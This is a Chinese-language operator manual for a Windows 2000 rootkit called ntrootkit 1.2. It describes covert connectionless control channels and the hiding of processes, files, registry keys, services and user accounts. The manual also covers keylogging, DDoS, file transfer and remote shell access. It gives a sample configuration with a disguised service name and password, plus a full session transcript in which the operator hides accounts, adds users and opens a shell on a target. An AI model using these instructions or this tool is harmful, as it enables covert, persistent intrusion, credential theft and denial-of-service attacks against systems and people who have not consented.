yyt_hac's ntrootkit 1.2 使用说明 一、简介 本ntrootkit采用无连接协议,不开端口,有四种协议可以选择(0:userdefined,1:icmp,2:udp,3:tcp),注意第三种 方式,它只是使用了tcp数据包进行通讯,并没有建立tcp连接,用这种方式只要把目标端口设置成任意一个目标机器上 开的端口,一般都会成功的机会很大。它隐藏进程,文件,目录,服务,注册表项和用户,提供一些很有用的命令。由 于该rootkit有ddos功能,请不要公开传播!如果已经安装了ntrootkit 1.0,必须用'-i'选项升级,重起系统后生效。 ntrootkit 1.1版增加了远程安装,ddos,键盘记录功能,该版本不公开,需要的可向我要。 ntrootkit 1.2版相对于1.1版做了如下改进: 1.修改不能进行键盘记录的bug 2.增加隐藏用户的命令 3.增加system命令,可以在不开命令行窗口的情况下执行外部命令,用system函数运行命令时会弹出命令行窗口, 因此改为用winexec执行,而这个函数不能执行系统内部命令,如dir等。 4.增加配置文件,可以自己配置rootkit,在下面有详细说明 5.隐藏的东西在3389终端中也看不到,注意:用hide系列命令添加的隐藏项在3389终端中不会马上被隐藏,而是在 重新连接终端后隐藏,在配置文件中添加的隐藏项在3389终端中安装完rootkit就能隐藏。 6.增加getsysinfo 命令,可以得到远程机器的一些基本信息 7.增加用fport也看不到被隐藏进程及其开的端口的功能 8.连接密码和网络通讯都进行加密 9.连接异常退出后不需要等几分钟,可以马上连接,但是客户端的ip和连接类型不能改变。 二、使用环境 Windows 2000系列操作系统(包括客户端和服务器端) 三、使用步骤 使用步骤和以前的版本相同,下面主要对rootkit的配置文件进行说明: 如果机器上已经安装了以前版本的ntrootkit,可以用'-i'选项进行升级,这时配置文件的内容不会起作用, 使用的是已经安装rootkit的设置,也可以先卸载,重启机器,再安装新版本。 1.配置文件名为ntrootkit.ini 2.配置文件在安装rootkit时必须放在和rootkit的安装文件同一个目录,包括本地和远程安装,当找不到配置文件时, 会以默认设置安装rootkit 3.在本地安装时,安装成功后会自动删除配置文件,远程安装则不会。 下面以一个例子对配置文件的各个部分进行解释: \\filename:ntrootkit.ini \\This is the init file of yyt_hac's ntrootkit,please modify it correctly or the rootkit \\can't be installed!!! [GLOBAL] \\servicename is the ntrootkit 's servicename servicename=tsserver installdir=com\sserver connpass=yyt_hac111 keylog=0 workmode=1 [HIDDEN PROCNAME] test.exe aaa aaa.exe [HIDDEN REGKEY] hklm\software\aaa aaa\ hklm\aaa* aaaa* [HIDDEN REGVALUE] hklm\software\aaa [HIDDEN FILEDIR] c:\dell [HIDDEN SERVICE] alter test service [HIDDEN USER] yyt_hac 1.以\\开头是注释行 2.[GLOBAL]下面是rootkit的一些基本设置 a.servicename是rootkit安装后的服务名 b.installdir是rootkit的安装后所在的目录,它相对于系统目录(%System%),注意,rootkit只会创建一层目录, 以上例子安装目录为com\sserver,com目录在系统目录下是存在的,rootkit只会创建sserver目录,如果com目录 不存在,安装就会失败。 c.connpass是连接密码,也是卸载和升级时要用的密码。 d.keylog为0,表示不进行键盘记录,为1表示进行键盘记录。 e.workmode为0表示用sniffer方式,为1表示用网络驱动程序收发数据包,建议用1。 3.[HIDDEN PROCNAME]下面是一些需要隐藏的进程名,最好不要用空格 4.[HIDDEN REGKEY]下面是一些需要隐藏的注册表键 5.[HIDDEN REGVALUE]下面是一些需要隐藏的注册表键值 6.[HIDDEN FILEDIR]下面是一些需要隐藏的文件和目录名 7.[HIDDEN SERVICE]下面是一些需要隐藏的服务名 8.[HIDDEN USER]下面是一些需要隐藏的用户名 一些新功能的演示 F:\public>rtclient 192.8.8.66 -p yyt_hac111 It is yyt_hac's ntrootkit client 1.2 Welcome to http://www.yythac.com Getting ip address of the computer... 1. 10.144.48.* 2. 192.8.8.* Please Select the number of the ip address you want to use to send and recv packet:2 Please select proto(0:userdefined,1:icmp,2:udp,3:tcp):3 Welcome to yyt_hac's ntrootkit Server 1.2 public version,use '?' command to get command list CMD>? ********yyt_hac's ntrootkit Server Command List******** ?-------------------------------Show this list HideFileDir [FileName or DIR]----------------------Hide the file or directory( para will show all file or directory been hidden) HideProcId [pid]----------------Hide process with the id HideProcName [procname]---------Hide process with the process name HideKey [KeyName]---------------Hide the registry key HideValue [ValueName]-----------Hide the registry value HideUser [UserName]-------------Hide the User HideServ [ServiceName]----------Hide the Service ShowFileDir FileName or DIR-----UnHide the file or directory that been hidden fore ShowProcId pid------------------UnHide the process that been hidden before wit the id ShowProcName procname-----------UnHide the process that been hidden before wit the process name ShowKey KeyName-----------------UnHide the registry key ShowValue ValueName-------------UnHide the registry value ShowUser UserName---------------UnHide the user that been hidden before ShowServ ServiceName------------UnHide the service that been hidden before Get RemoteFilePath [LocalFilePath]----Get the remote file to local computer Put LocalFilePath [RemoteFilePath]----Put the local file to remote computer KeyLogOn------------------------------Start key log KeyLogOff-----------------------------Stop key log DDOS DDos_Destip [DDos_Destport DDos_type DDos_seconds DDos_ProcCount]---DDos e destip SDDOS---------------------------------Stop DDos GetPwd [LocalFilePath]----------------Get the ntrootkit keylog password file t local computer DelPwd--------------------------------Del the ntrootkit keylog password file Ps------------------------------------Show all processes on remote machine Kill pid------------------------------Kill the process with the id or name RTVer---------------------------------Show Ntrootkit server version and author nfo SetPass [NewPassword]-----------------Change or show the connection password Reboot--------------------------------Reboot the targer computer OpenShell-----------------------------Open a command shell system command------------------------excute command use system fuction getsysinfo----------------------------get remote system infomation Exit----------------------------------Exit the shell or rootkit CMD>hideuser The Hide User: GUEST CMD>system net user yyt_hac /add command excute successfully! CMD>system net user yyt_hac /del command excute successfully! CMD>getsysinfo Number of CPU:1 Type of CPU:Intel Pentium III or high System Version:Windows nt 5.0 build:2195 Service Pack:3.0 Product type:Windows 2000 Server Computer Name:YYTHAC System Dir:C:\WINNT\system32 CMD>openshell Microsoft Windows 2000 [Version 5.00.2195] (C) 版权所有 1985-2000 Microsoft Corp. C:\WINNT\system32>cd \ cd \ C:\>net user net user \\ 的用户帐户 ------------------------------------------------------------------------------ __vmware_user__ ACTUser ASPNET IUSR_EIS-ZH IWAM_EIS-ZH root SQLAgentCmdExec SQLDebugger TsInternetUser VUSR_EIS-ZH VUSR_YYT_HAC 命令运行完毕,但发生一个或多个错误。 C:\>showuser guest ShowUser:successfully C:\>net user net user \\ 的用户帐户 ------------------------------------------------------------------------------ __vmware_user__ ACTUser ASPNET Guest IUSR_EIS-ZH IWAM_EIS-ZH root SQLAgentCmdExec SQLDebugger TsInternetUser VUSR_EIS-ZH VUSR_YYT_HAC 命令运行完毕,但发生一个或多个错误。 C:\>exit CMD>^C //异常退出 F:\public>rtclient 192.8.8.66 -p yyt_hac111 //继续上一个连接 It is yyt_hac's ntrootkit client 1.2 Welcome to http://www.yythac.com Getting ip address of the computer... 1. 10.144.48.* 2. 192.8.8.* Please Select the number of the ip address you want to use to send and recv packet:2 Please select proto(0:userdefined,1:icmp,2:udp,3:tcp):3 continue session 21137 CON>getsysinfo Number of CPU:1 Type of CPU:Intel Pentium III or high System Version:Windows nt 5.0 build:2195 Service Pack:3.0 Product type:Windows 2000 Server Computer Name:YYTHAC System Dir:C:\WINNT\system32 CMD>exit exit successfully bye bye F:\public> 四、本版本面向的用户 1.我的朋友 2.在开发和测试rootkit中帮助过我的人 3.用工具和我交换 请得到该工具的人不要放在网上下载,不要公开传播 五、和我联系 个人主页:http://www.yythac.com Email:webmaster@yythac.com QQ:47090005 icq:272288117